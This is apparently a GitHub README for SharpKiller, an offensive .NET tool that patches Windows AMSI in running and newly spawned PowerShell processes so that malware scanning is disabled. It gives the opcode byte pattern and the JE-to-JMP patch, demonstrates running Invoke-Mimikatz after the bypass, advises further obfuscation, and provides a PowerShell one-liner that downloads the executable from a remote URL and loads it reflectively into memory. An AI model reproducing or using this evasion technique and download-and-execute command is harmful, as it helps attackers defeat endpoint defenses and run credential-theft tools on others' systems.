Awesome
SharpKiller
Lifetime AMSI bypass AMSI-Killer by @ZeroMemoryEx ported to .NET Framework 4.8.
Additional Obfuscation required
Newly integrated features:
[ x ] - Live scan for new powershell processes every 0.5 seconds -> Automatically patches new powershell instances
Building the solution
- Set your platform explicitly to x64 in Build > configuration manager
How does it work?
Opcode Scan
-
we get the exact address of the jump instruction by searching for the first byte of each instruction this technique is effective even in the face of updates or modifications to the target data set.
-
for example :
| 48:85D2 | test rdx, rdx |
| 74 3F | je amsi.7FFAE957C694 |
| 48 : 85C9 | test rcx, rcx |
| 74 3A | je amsi.7FFAE957C694 |
| 48 : 8379 08 00 | cmp qword ptr ds : [rcx + 8] , 0 |
| 74 33 | je amsi.7FFAE957C694 |
-
the search pattern will be like this :
{ 0x48,'?','?', 0x74,'?',0x48,'?' ,'?' ,0x74,'?' ,0x48,'?' ,'?' ,'?' ,'?',0x74,0x33}
Patch
Before Patch
-
The program tests the value of RDX against itself. If the comparison evaluates to 0, the program executes a jump to return. Otherwise, the program proceeds to evaluate the next instruction
<img src="https://github.com/S1lkys/SharpKiller/assets/40408435/59f4ef29-9ed1-4d14-9ea8-f29bf299534d" height="500"> -
we cant execute "Invoke-Mimikatz"
After Patch
-
we patch the first byte and change it from JE to JMP so it return directly
-
now we can execute "Invoke-Mimikatz" <img src="https://raw.githubusercontent.com/S1lkys/SharpKiller/main/media/demo_.jpg" height="450">
Newly created processes
- Sharp-Killer will patch any newly created Powershell processes in near real time. <img src="https://raw.githubusercontent.com/S1lkys/SharpKiller/main/media/demo.jpg" height="450">
Video demo
OneLiner to run with reflection
$url = "https://github.com/S1lkys/SharpKiller/releases/download/1.1/Sharp-Killer.exe"; $cli = New-Object System.Net.WebClient; $sk=[System.Reflection.Assembly]::Load([byte[]]( $cli.DownloadData($url)));$vars = New-Object System.Collections.Generic.List[System.Object];$BindingFlags= [Reflection.BindingFlags] "NonPublic,Static";$sk.EntryPoint.Invoke($null,@(,$passed));
This error occurs while using mentioned OnLiner?
If you ever saw this message and wondered about it - welcome to the .NET AMSI Interface! :-)
Exception calling "Load" with "1" argument(s): "Could not load file or assembly '288768 bytes loaded from Anonymously Hosted DynamicMethods Assembly, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies. An attempt was made to load a program with an incorrect format."